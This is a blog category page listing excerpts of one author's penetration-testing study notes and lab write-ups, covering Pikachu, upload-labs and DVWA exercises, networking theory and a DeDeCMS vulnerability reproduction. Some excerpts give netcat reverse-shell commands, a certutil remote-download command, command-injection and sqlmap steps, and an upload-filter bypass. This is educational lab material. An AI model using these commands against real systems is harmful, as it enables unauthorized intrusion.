
网络渗透
文章平均质量分 65
Back~~
这个作者很懒,什么都没留下…
展开
-
基础入门-Web应用&架构搭建&漏洞&HTTP数据包
SQL注入、文件安全、RCE执行、XSS跨站、CSRF/SSRF/CRLF。这里给一个网站搭建的视频链接,之前又搞过搭建服务器,这里就不再重做了。之前搞了一个bp工具,无需破译,但是记得自己上一个java的环境。反序列化、逻辑越权、未授权访问、XXE/XML,弱口令安全等。值得注意的是,域名可以购买,但是域名在国内要备案才可以访问。所以最好服务器购买的时候选择,国外地区。bp抓包工具在之前的渗透文章中有介绍。理解不同WEB应用组成角色功能架构。文件夹判断是(403存在)文件判断是200存在。原创 2024-10-14 22:35:47 · 416 阅读 · 0 评论 -
操作系统_名词_文件下载_反弹SHELL_防火墙绕过
实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)certuil -urlcache -split -f ip地址。结合案例1:防火墙绕过-正向链接&反向链接&内网服务器。实用案例1:文件上传下载-解决无图形化&解决数据传输。nc -e cmd ip地址 端口(就是正向链接)操作系统-用途&命令&权限&用户&防火墙。4、系统用户&用户组&服务用户等分类。nc -e cmd ip地址 端口。3、文件权限&服务权限&用户权限。nc -e cmd ip地址。原创 2024-09-29 14:08:42 · 833 阅读 · 0 评论 -
计算机网络复习
隐藏终端问题:在通信领域,基站A向基站B发送信息,基站C未侦测A也向B发送信息,故A和C同时将信号发送至B,引起信号冲突,最终导致发送至B的信号丢失了两种方法:一种是接受节点在接收的同时发送忙音来通知邻居节点,即BTMA系列;第二种则是发送节点在数据发送前与接收节点进行一次短控制消息握手交换,以短消息的方式通知邻居节点它即将进行接收,即RTS/CTS方式三次握手(2分)第一次:发送方seq=1000 接收方:ack=1100第二次:发送方seq=1100接收方:ack=1200。原创 2024-06-19 17:40:35 · 1334 阅读 · 1 评论 -
Upload-lab(pass1~2)
因此上传shell.php抓包修改content-type为图片类型:image/jpeg、image/png、image/gif。因为是前端js校验,所以只用绕过js前端校验。仅仅判断content-type类型。用burp抓包修改文件类型。写一个简易版本的php。原创 2023-12-26 22:52:12 · 556 阅读 · 0 评论 -
Unsafe Filedownload(Pikachu)
很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能导致攻击着可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件。( 又称:任意文件下载)打开 unsafe filedownload 不安全的文件下载,正常功能点击球员名字,就可以下载图片。将filename=后面的值改成其他文件。例如改成ai.png就可以下载其图片了。原创 2023-12-26 22:15:13 · 140 阅读 · 0 评论 -
渗透测试(Lab4.2)
配置WebDeveloper的时候遇到一个错误导入失败,因为 E:\系统\IE10.Win8.For.Windows.VMware\IE10-Win8.ovf 未通过 OVF 规范一致性或虚拟硬件合规性检查。请单击“重试”放松 OVF 规范与虚拟硬件合规性检查,并重新尝试导入;或单击“取消”以取消导入。原创 2023-12-26 17:37:56 · 1465 阅读 · 0 评论 -
暴力破解(Pikachu)
这个也需要输入验证码,但是后面进行字典爆破的时候,需要把验证码删掉。这里爆破因为token的变化,所以用音叉进行爆破。server服务端要输入正确的验证码后进行爆破。先随便输入一下,然后抓包,进行字典爆破。之后的操作没什么不一样。删掉验证码后进行爆破。原创 2023-12-26 14:16:51 · 97 阅读 · 0 评论 -
File Inclusion(Pikachu)
提交的是一个目标文件的路径,我们可以改成一个远端的路径,读取远程文件。找到自己的文件(本地文件)shell.php的路径写上去。观察url,显示是一个文件file1.php。这时会自动生成一个yijuhua.php文件。再次访问此路径就可以执行我们想要的命令。可以直接通过url修改这个文件。原因:这个后台系统是没有的。用Pikachu提供的。这里随便点击一个提交。原创 2023-12-26 14:02:25 · 331 阅读 · 0 评论 -
RCE(Pikachu)
ping 靶场的ip & 系统命令(ipconfig、whoami。原创 2023-12-26 13:34:14 · 138 阅读 · 0 评论 -
CSRF(Pikachu)
虽然POST请求无法通过伪造URL进行攻击, 但是可以通过伪造恶意网页, 将伪造的POST请求隐藏在恶意网页的表单中, 然后诱引用户点击按钮提交表单, 数据自然就POST至存在CSRF漏洞的网页, 最终用户的信息会被修改。查看token_get_edit.php的源码, 发现有一个set_token()函数, 该函数每次刷新页面都会被调用, 然后将SESSION中的token销毁, 并生成新的token发送至前端表单中。这里用bp的工具生成恶意代码。抓包看看我们的url。原创 2023-12-25 22:39:06 · 284 阅读 · 0 评论 -
渗透实验 XSS和SQL注入(Lab3.0)
打开Metasploitable2后,里面有搭建好的DVWA,访问http://Metasploitable的IP/dvwa (可能需要先扫描一下内网的ip,确定Metasploitable2的ip地址)并且把安全等级设置为最低。右边就是可以控制浏览器的转跳,这里我跳的是百度。–tables:枚举指定数据库的所有表。–columns:获取列的信息。,还有你的文件路径是否一样。-D 数据库名:指定数据库。-T:指定数据库中的数据表。–dbs:枚举当前数据库。密码是之前自己设置好的。-C:枚举数据表中的列。原创 2023-12-23 21:46:40 · 536 阅读 · 0 评论 -
渗透测试实验(Lab2.0)
利用人们平时常用的词、句破译,如果说暴力破解是一个一个的尝试那么字典破译就是利用人们习惯用人名、地名或者常见的词语设置成密码的习惯进行破译。字典破译速度比暴力破译更快但是有时候密码设置中包含了没有字典库中的词句就无法破解出来了,因此有好的字典是关键。在互联网上找到任意一个以明文方式传递用户帐号、密码的网站,B是否能看到A和外网(该网站)的通信(A刚输入的帐户和口令)?ARP攻击是一种常见的网络攻击,攻击者可以通过伪造ARP报文,将目标主机的IP地址与自己的MAC地址进行绑定,从而实现中间人攻击。原创 2023-12-21 20:47:36 · 180 阅读 · 0 评论 -
渗透测试(Lab1.1)
2017年5月12日,不法分子通过改造“永恒之蓝”制作了WannaCry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站的位置,从而初步确定手机用户的位置。两者值不相同,因为我访问的网址主机在外网,前者是经过路由器转换后的外网地址,后者是我的内网网址。原创 2023-12-07 23:32:41 · 341 阅读 · 0 评论 -
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改(漏洞复现)
打开源码目录下D:\phpstudy_pro\WWW\dedecms\include,找到dedesql.class.php和dedesqli.class.php两个php文件,用notepad++打开,然后ctrl+F寻找safeCheck,把TURE改为FALSE,关闭安全检查。就是这里的判断出现了问题,因为使用了不够严谨的 == 进行了比较,导致if语句的条件为真,就会进入分支,进入sn函数。然后放回页面,退出我们的账号,来到下面这个页面。如果他会让你下载,点击是就好!然后按着以下教程安装就好!原创 2023-12-03 18:08:04 · 967 阅读 · 0 评论 -
网络渗透测试(认识)
如果本机想与某台主机通信,首先在ARP告诉缓存(动态更新)中查找此台主机的IP和MAC信息,如果存在,则直接利用此MAC地址构造以太桢;在TCP/IP网络中对客户机动态分配和管理IP地址等配置信息,以简化网络配置,方便用户以及管理员的管理。每一个主机都有ARP高速缓存,此缓存中记录了最近一段时间的内其他IP地址与其MAC地址的对应关系。源网址地址转换-Source NAT-SNAT,IP伪装-IP Masquerade。DHCP服务器可以是一台运行的计算机,也可以是一台路由器和交换机。原创 2023-11-27 10:00:06 · 143 阅读 · 0 评论 -
网络渗透测试(wireshark 抓取QQ图片)
我们知道传输用的TCP,同时我们给自己电脑发送的JPG文件,此文件头的是FFD8,注意是十六进制!同时我们发现在winhex里面,保存了一些信息,比如我的手机是什么,什么时候发的。我们先给我们的QQ发送一张图片,用自己的手机发送给电脑。然后把前面的删除掉,保存此文件用JPG的形式。发现用post传参,此外QQ群号也出来了。QQ的关键词是oicq,所以我们直接找。然后点击左上角的正方形,停止捕获抓包。然后保存好后我们就可以打开我们的图了。我们可以看到我们发送的QQ号。数值搜索到FF D8。原创 2023-11-22 10:54:24 · 1503 阅读 · 0 评论 -
网络渗透测试(TCP/IP)理论篇
而UDP是一种无连接的协议,不提供可靠性和流量控制,适用于实时性要求较高的应用,如音频和视频传输。它可以使用基于数字的格式(如标准ACL和扩展ACL),也可以使用基于名称的格式(如命名ACL)。在编程中,不同的编程语言和操作系统提供了各自的套接字API函数和库,用于创建、设置和使用套接字。常见的网络编程库如Python的socket模块和Java的java.net包提供了丰富的套接字功能和方法。通过使用IP协议和网际层提供的路由功能,不同的计算机和设备能够在广域网上进行通信,构建出一个全球范围的互联网。原创 2023-11-20 11:31:38 · 560 阅读 · 0 评论 -
网络渗透测试(被动扫描)
Google Hacking 是利用谷歌搜索的强大,来在浩瀚的互联网中搜索到我们需要的信息。轻量级的搜索可以搜素出一些遗留后门,不想被发现的后台入口,中量级的搜索出一些用户信息泄露,源代码泄露,未授权访问等等,重量级的则可能是mdb文件下载,CMS 未被锁定install页面,网站配置密码,php远程文件包含漏洞等重要信息。WAF 可以是基于网络的,也可以是基于主机的,还可以是云端的服务提供。例如,基于网络的 WAF 通常用于保护网络边界,而基于主机的 WAF 则更适用于保护特定的应用程序。原创 2023-11-13 20:37:49 · 377 阅读 · 0 评论 -
网络渗透课2
对于校园少了inet地址桥接模式是一种网络连接模式,它允许虚拟机与物理网络中的其他设备直接相连。在桥接模式下,虚拟机可以获得与物理网络中其他设备相同的网络访问权限和IP地址。当虚拟机使用桥接模式时,虚拟网络适配器会通过主机的物理网络接口进行通信。这使得虚拟机能够像物理机一样在网络中作为独立的实体存在,并使用与物理机相同的IP地址段、子网掩码和网关。虚拟机可以与物理网络中的其他设备直接通信,享有完整的网络功能。虚拟机可以被分配给一个公网IP地址,使其可以从互联网中直接访问。原创 2023-11-06 23:16:22 · 367 阅读 · 0 评论